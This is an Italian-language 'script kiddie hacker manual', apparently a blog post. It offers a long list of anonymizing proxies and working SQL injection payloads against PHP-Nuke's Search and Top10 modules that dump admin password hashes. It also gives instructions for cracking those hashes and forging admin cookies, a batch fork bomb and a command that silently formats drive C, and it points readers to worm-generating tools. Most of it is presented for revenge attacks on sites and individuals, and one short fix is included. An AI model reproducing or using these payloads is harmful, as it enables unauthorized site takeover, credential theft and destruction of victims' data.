Il Manuale del perfetto Hacker

Il Manuale del perfetto Hacker..ma visto che siete qui tanto vale dire "il manuale dello script kiddie"

 Hacker, cracker, lamer.. quante volte abbiamo sentito queste parole?? Quasi mai..o solo in rari casi clamorosi..comunque se siete finiti qui vuol dire che siete degli script kiddie ovvero predendenti ad appartenere ad 1 di queste categorie.

Per chi non lo sapesse scrivo la definizione dei tre termini:

Hacker - programmatore innocuo. buca i sistemi e poi rivela il bug all'amministratore.

Cracker - controfigura dell'hacker in versione cattiva.

Lamer - categoria schifosa. fa danni per vantarsi e va in giro dicendo di essere un hacker.

Allora come ho già detto questo è il manuale del perfetto script kiddie...qui vi indicherò i migliori software x l'hacking e anche 1 corso di un linguaggio di programmazione: Il Visual Basic.

Premetto che dato che non voglio lamerate non posterò i file utili per fare del male ma se proprio volete rompere le scatole a qualcuno basterà lasciare 1 commento ed entro poche ore il file sarà postato..(dovete lasciarmi l'indirizzo mail).

OK Partiamo.

Allora se siete script kiddie vorrete diventare hacker 1 giorno e quindi dovete imparare a programmare.

Corso visual Basic.txt (96,4 kB)

Qui sopra c'è 1 file .txt. Dunque, è un breve corso di Visual Basic, un linguaggio di programmazione Event-driven, ovvero ad eventi. E' uno dei linguaggi di programmazione più usati ad oggi.

Per metterlo in pratica dovrete scaricare il programma Visual Basic 2008 (Se trovate la versione 6.0 è meglio perché è quella del corso.)

Voglio dedicare 1 attimo per spiegare quello che 1 script kiddie può fare:

Un Hacker non dice quello che sa, un lamer dice quello che non sa

Bene ora che ho spiegato questa differenza proseguiamo.

Presumiamo di avere già imparato il Visual Basic (se vi ci impegnate lo imparate in 15 giorni, in altri 15 lo padroneggiate e in altro 15 create come dei programmatori) e ora stiamo girando su dei siti. Un sito per esempio ci banna per un motivo assurdo e noi vorremmo hackerarlo.. (solo per motivi seri! è un reato informatico) ora vi spiegherò come farlo. Ah.. vi ricordo che questo sito ha un anti-hacker e se provate ad hackerarlo vi beccate 3 anni di carcere per reato informatico.

Hackerare un Sito PhpNuke
fino ver 7.2

Ok prima di tutto dobbiamo proxarci. vi dò un elenco di 260 web proxy gratuiti per navigare...anonimi.

Anonymouse —— Hideandgosurf —— 3 Proxy —— 3 Proxy —— 3 Proxy —— 4 Proxy—— A1 Proxy —— A Free Proxy —— Alien Proxy —— Anonymate —— Anonymizer ——Anonymouse —— Anonymousurfing —— Anonypath —— Anonypath —— Anonypost—— Anoxx —— Anti-boredom —— Anti Trace —— Anti Trace —— Antiwebfilter —— A Proxy Site —— Arnit —— At School —— Techno —— Awkward Alliteration —— Backfox—— Bbscience —— Best Proxy —— Big Proxy —— Block My —— Boardmerlin —— Bored At School —— Box Proxy —— Browse At School —— Browse At Work —— Btunnel ——Bypasser —— Bypassit —— Cacheless —— Cecid —— Cgi-proxy —— Clever Proxy ——Click Cop —— Click These —— Cloaker —— Cloak My —— Coconia —— Concealme ——Cool Handle —— Ctunnel —— Dark Proxy —— Dejacey —— Desire Proxy —— Dnbroker—— Drpruxy —— Dtunnel —— Eat More Blueberries —— E-konkursy —— Estealth ——Exo Proxy —— Ez Proxy —— Famous5 —— Fly Proxy —— Foxy Proxy —— Frast Proxy—— Free Http Proxy —— Free Internet Proxy —— Free Proxy —— Free-proxy —— Free Proxy —— Freetoview —— Free Usa Proxy —— Free Web Proxy —— Fritoon —— Fsurf—— Fully Sick Proxy —— Gamecrib —— Get Past —— Get Proxy —— Ghostclick ——Green Rabbit —— Hatkoff —— Hide —— Hide And Go Surf —— Hide-me —— Hide Your—— Hidip —— Hujiko —— I Am New Guy —— Ibypass —— Ibypass —— Ibypass ——Ibypass —— Ibypass —— Ibypass —— Ideal Proxy —— Idoxy —— Intbonline ——Ipbounce —— Ipbouncer —— Ip-privacy —— Ipsecret —— Ipzap —— Jiggyworm ——Jj4 —— Just Hide —— Just Proxy —— Just Proxy It —— Kampen —— Kaz Proxy ——Kezfun —— Let Me By —— Link2caro —— Lite Proxy —— Live Proxy —— Log Buster—— Log Buster —— Melloyello —— Mfp —— Mint Proxy —— Mister Proxy —— Monkey Signs —— Mr Proxy —— Msnvip —— Msxsecurity —— My Cgi Proxy —— My Free Proxy—— My Proxysurfer —— Myspacehooker —— My Web Tunnel —— Netsack ——Network Techs —— Nfan —— Ninja Proxy —— Node Proxy —— Nopath —— Nopath ——Nsfwurl —— Page Hot —— Page Wash —— Paper Tiger Shark —— Pc-portal ——Peoples Proxy —— Perfect Proxy —— Perl Proxy —— Php Proxy —— Phproxy ——Phproxy —— Pimpmyip —— Pimp Proxy —— Pionas —— Porno Proxy —— Poxy ——Preoxy —— Preps On Crack —— Presto Proxy —— Prime Proxy —— Procksee ——Project Bypass —— Proxatron —— Proxene —— Proxert —— Proxify —— Proxify ——Proxify —— Proxify —— Proxify —— Proxify —— Proxify —— Proxify —— Proxy ——Proxy1 —— Proxy121 —— Proxy7 —— Proxy77 —— Proxy Arcade —— Proxy Aware ——Proxyboys —— Proxy Browsing —— Proxybull —— Proxy Buster —— Proxycat ——Proxy Chat Room —— Proxy Circle —— Proxy Craze —— Proxy Detective —— Proxy Devil —— Proxy Drop —— Proxy Drop —— Proxy Drop —— Proxy Drop —— Proxy Drop—— Proxy Eyes —— Proxy For All —— Proxy Fox —— Proxy Free —— Proxyful ——Proxy Gasp —— Proxy Genie —— Proxy Hut —— Proxy Jet —— Proxy Kingz —— Proxy Lord —— Proxy Maxi —— Proxy Mod —— Proxy Nut —— Proxy Party —— Proxy Please—— Proxy Prince —— Proxy Rocket —— Proxy Shock —— Proxy Spy —— Proxy-surf ——Proxy Surfing —— Proxy Tap —— Proxy Tastic —— Proxy The Web —— Proxy Through—— Proxy Togo —— Proxy Touch —— Proxy Wave —— Proxy Web —— Proxy Website—— Proxy Whip —— Proxyz —— Pruxy —— Prxxy —— Psurf —— Pt Proxy —— Public- Proxy —— Pxy —— Quiet Proxy —— R45 —— Radio-farda —— Rapid Proxy —— Roach Host —— Runarcade —— Safe For Work —— Safe Hazard —— Sd9 —— Secret Browse—— Smart- Proxy —— Smart Proxy —— Smart Proxy —— Sneak2 —— Sneaky Proxy—— Sneaky Surf —— Sneaky User —— Snoop Block —— Snoop Block —— Snoop Blocker —— Snoop Blocker —— Some Proxy —— Song Today —— Sonic Pig —— Spiffy Proxy —— Spysurfing —— Stealth-ip —— Stoptheblock —— Student Proxy —— Stupid Proxy —— Surf-anon —— Surfby Proxy —— Sweet Proxy —— Switch Proxy —— Team Proxy —— Tech Takeover —— Teen Proxy —— Tera Proxy —— That Proxy —— The Cgi Proxy —— The Proxy —— The Proxy Free —— The Proxy Site —— The Proxy Spot ——The Web Tunnel —— Tnt Proxy —— Torify —— Total Upload —— Traceless —— Unblock—— Unblock My Space —— Unbloxy —— Undirect —— Unipeak —— United Email Systems —— Urlencoded —— Use Proxy —— Virtual-browser —— Vpntunnel ——Vrijsurfen —— Vtunnel —— W3privacy —— Want Proxy —— Website Proxy ——Webtools King —— White Proxy —— Wkccp —— Work Browse —— World Want ——Xerohour —— Xxx Proxy —— Your-proxy —— Your Proxy —— Yours Domain



Sfruttare il
bug Cerca/Search
Bene ora vi insegnerò molto semplicemente come diventare Admin di un sito che
gira su phpnuke, rubando l'account all'admin stesso, sfruttando il più famoso bug,
presente nel blocco "Cerca" o meglio conosciuto "Search".
E' molto semplice, se la versione del nuke non è fixata, al 90% il metodo
funzionerà. Come prima cosa cerchiamo un sito che gira su phpnuke, possiamo
usare anche il nostro fido google, nella stringa di ricerca possiamo inserire allinurl:”.php?dest=”
con il quale possiamo trovarci genericamente, i siti fatti in php, o,
Powered by PHPNuke,
per trovare più precisamente siti fatti in phpnuke, trovato il nostro
sito nel blocco cerca o search inseriamo una stringa che chieda al
database SQL, di mostrarci i nomi degli admin con le relative password,
la stringa è questa :
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

ora ci verrà mostrata una pagina con tutti gli admin e delle scritte blu
linkabili, bè, se è una vecchia versione nel nuke, quelle saranno le nostre
pass, ma se la versione è aggiornata vedremo tanti numeri e lettere, perchè la
pass, e cryptata in md5, per decriptarla possiamo usare programmi reperibili in rete
come cain oppure inserirla qua
www.milw0rm.com e fare
di tanto in tanto un refresh della pagina per vedere se la pass è decryptata.
Fatto questo, come ultimo passaggio entriamo nella sezione admin (www.sitovittima.com/admin.php)
, ci proxyamo (se non volete eventuali denuncie) inseriamo i dati trovati,
e il gioco è fatto siamo admin!
Sfruttare il
bug Top 10 nella 7.6
Bene ora vi spiegherò come sfruttare un bug pervia del modulo Top10 in un
sito nel quale gira phpnuke 7.6 sempre se non ci siano installati sistemi di
protezione tipo Sentinel o Protector System.
Bene parliamo del bug scoperto da Waraxe, che per default si trova nella
directory :


www.vittima.com/phpNuke/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors

Inviando questo Url (naturalmente sostituendo "www.vittima.com"
con il sito da bucare) inietteremo (dalla parola injection) il nostro codice
SQL, che chiederà al database di mostrarci oltre alla top10 e la... pure le pass
degli admin. E usiamo cain o su
www.milw0rm.com potremo
decryptare la pass trovata, come al solito ci proxyamo andiamo in admin
inseriamo i dati trovati ed il gioco è fatto...


Nel caso non riuscissimo a Decryptare le pass md5 come faccio?
Io ho le risposte a tutto, se non riusciamo a decryptare le pass
useremo i cookies del FireFox (non si accetta software scadente del tipo IEzoz),
allora facciamo un giro nel sito vittima per assicurarci che lasci traccia con i
suoi cookie, e apriamo il file cookies.txt che si trova ( io uso windows)
in C:Documents and SettingsxxxxDati applicazioniMozillaFirefoxProfilesxxxxcookies.txt
e apriamolo con il blocco note e cerchiamo la riga che parla del sito vittima...
Prendiamo la pass cryptata andiamo qua

base64-encoder-online.waraxe.us nel riquadro in basso ricopiamo
NomeAdmin:PassCryptata , clicchiamo su encode data, ora sostituiamo
eventuali "=" (senza le virgolette) finali con %3D, ritornando al nostro
cookies.txt cambiamo la stringa user con admin, e, nella stringa
successiva mettiamo quella cryptata che avevamo ricryptato, salviamo, e
riavviamo firefox. Ora proviamo a riandare nel sito, siamo admin!!!!


Come sistemare il bug?


Aprite il file "/modules/Top/index.php" e cercate questa riga:

$result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM
".$prefix."_poll_desc $querylang order by voters DESC limit 0,$top", $dbi);

Aggiungete una "p" alla stringa $querylang , quindi il codice che dovrete
salvare sarà :

$result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM ".$prefix."_poll_desc
$queryplang order by voters DESC limit 0,$top", $dbi);




Le stringhe vengono constantemente aggiornate

Ok stiamo diventando esperti ma avevo detto che per padroneggiare il linguaggio di programmazione BASIC ci vogliono circa 45 giorni.. e se mentre questi 45 giorni ci succedesse qualcosa??

Ci sono vari metodi per stupire una persona...per esempio lo spavento..se gli bloccassimo msn? Ci basterà scaricare l'ultima versione di Msn Freezer per bloccargli il contatto a tempo indeterminato..oppure potremmo creare un virus sul suo pc. Ecco come fare.

Metodo I : Comando batch per bloccare il pc.

Apriamo il Blocco note e scriviamo:

@echo off

Start error.bat

error.bat

Il file sarà nominato error.bat

PS: non è propriamente 1 virus ma un comando batch che apre infinite volte se stesso fino a riempire la CPU del computer.

Metodo II : Comando batch per formattare l'unita C

Apriamo il blocco note e scriviamo:

format: C /autotest /q /u

Il file salvato come formarC.bat

PS: non è propriamente 1 virus ma un comando batch che formatta l'unità C senza chiedere autorizzazione (/q) e senza possibilità di essere fermato in seguito (/u).

Metodo III: Creare un Worm 

Questo sistema è un po' da lamer..comunque..

Scaricate VBS Worm generator da Internet e seguite l'intuito per creare 1 virus.

Vi consiglio anche Nazgul per questo scopo.

Questi sistemi sono pericolosi e vanno usati con cautela...non voglio incoraggiare il pubblico a commettere atti illegali.

Io e il mio staff non ci assumiamo nessuna responsabilità per l'uso che farete di queste informazioni. SOLO A SCOPO INFORMATIVO